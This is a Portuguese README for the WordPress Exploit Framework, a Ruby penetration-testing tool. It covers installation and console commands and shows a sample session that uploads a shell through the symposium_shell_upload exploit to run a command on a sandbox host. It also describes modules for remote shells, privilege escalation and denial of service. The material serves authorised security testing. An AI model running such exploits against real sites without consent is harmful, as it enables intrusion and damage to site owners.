
Um framework Ruby projetado para auxiliar nos testes de penetração de sistemas WordPress.

Um framework Ruby projetado para auxiliar no teste de penetração de sistemas WordPress.
Para instalar a versão estável mais recente, execute gem install wpxf.
Após a instalação, você pode iniciar o console do WordPress Exploit Framework executando wpxf.
Ruby >= 2.4.4 é necessário para executar o WordPress Exploit Framework.
Se você tiver problemas ao instalar as dependências do WPXF (em particular, o Nokogiri), primeiro certifique-se de ter todas as ferramentas necessárias para compilar extensões C:
sudo apt-get install build-essential patch
É possível que você não tenha arquivos de cabeçalho de desenvolvimento importantes instalados no seu sistema. Aqui está o que você deve fazer se estiver nessa situação:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev
Se você estiver enfrentando erros que indicam que libcurl.dll não pôde ser carregada, você precisará garantir que o binário mais recente do libcurl esteja incluído na sua pasta bin do Ruby, ou em qualquer outra pasta que esteja na variável PATH do seu ambiente.
A versão mais recente pode ser baixada de http://curl.haxx.se/download.html. Em 16/05/2016, a versão mais recente é marcada como Win32 2000/XP zip 7.40.0 libcurl SSL. Após baixar o arquivo, extraia o conteúdo do diretório bin para o diretório bin do Ruby (se solicitado, não substitua nenhuma DLL existente).
Inicie o console do WordPress Exploit Framework executando wpxf.
Depois de carregado, você verá o prompt wpxf. A partir daqui, você pode pesquisar módulos usando o comando search ou carregar um módulo usando o comando use.
Carregar um módulo no seu ambiente permitirá definir opções com o comando set e visualizar informações sobre o módulo usando info.
Abaixo está um exemplo de como carregar o módulo de exploit symposium_shell_upload, definir as opções do módulo e do payload e executar o exploit contra o alvo.
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Para uma lista completa de comandos suportados, dê uma olhada em Esta Página Wiki.
Módulos auxiliares não permitem executar payloads na máquina alvo, mas permitem extrair informações do alvo, escalar privilégios ou fornecer funcionalidade de negação de serviço.
Módulos de exploit exigem que você especifique um payload que posteriormente é executado na máquina alvo, permitindo executar código arbitrário para extrair informações da máquina, estabelecer um shell remoto ou qualquer outra coisa que você queira fazer no contexto do servidor web.
Todos esses payloads, com exceção do custom e dos payloads Meterpreter, se deletarão após serem executados, para evitar deixá-los espalhados na máquina alvo após o uso ou no caso de serem usados para estabelecer um shell que falhe.
Guias sobre como escrever módulos e payloads podem ser encontrados em The Wiki e a documentação completa da API pode ser encontrada em https://rastating.github.io/wordpress-exploit-framework
Copyright (C) 2015-2018 rastating
Executar o WordPress Exploit Framework contra sites sem consentimento mútuo prévio pode ser ilegal em seu país. O autor e as partes envolvidas em seu desenvolvimento não aceitam nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado pelo WordPress Exploit Framework.
Este programa é um software livre: você pode redistribuí-lo e/ou modificá-lo sob os termos da GNU General Public License conforme publicada pela Free Software Foundation, seja a versão 3 da Licença, ou (a seu critério) qualquer versão posterior.
Este programa é distribuído na esperança de que seja útil, mas SEM NENHUMA GARANTIA; sem mesmo a garantia implícita de COMERCIALIZAÇÃO ou ADEQUAÇÃO A UM PROPÓSITO ESPECÍFICO. Consulte a GNU General Public License para obter mais detalhes.
Você deve ter recebido uma cópia da GNU General Public License junto com este programa. Se não, veja http://www.gnu.org/licenses/.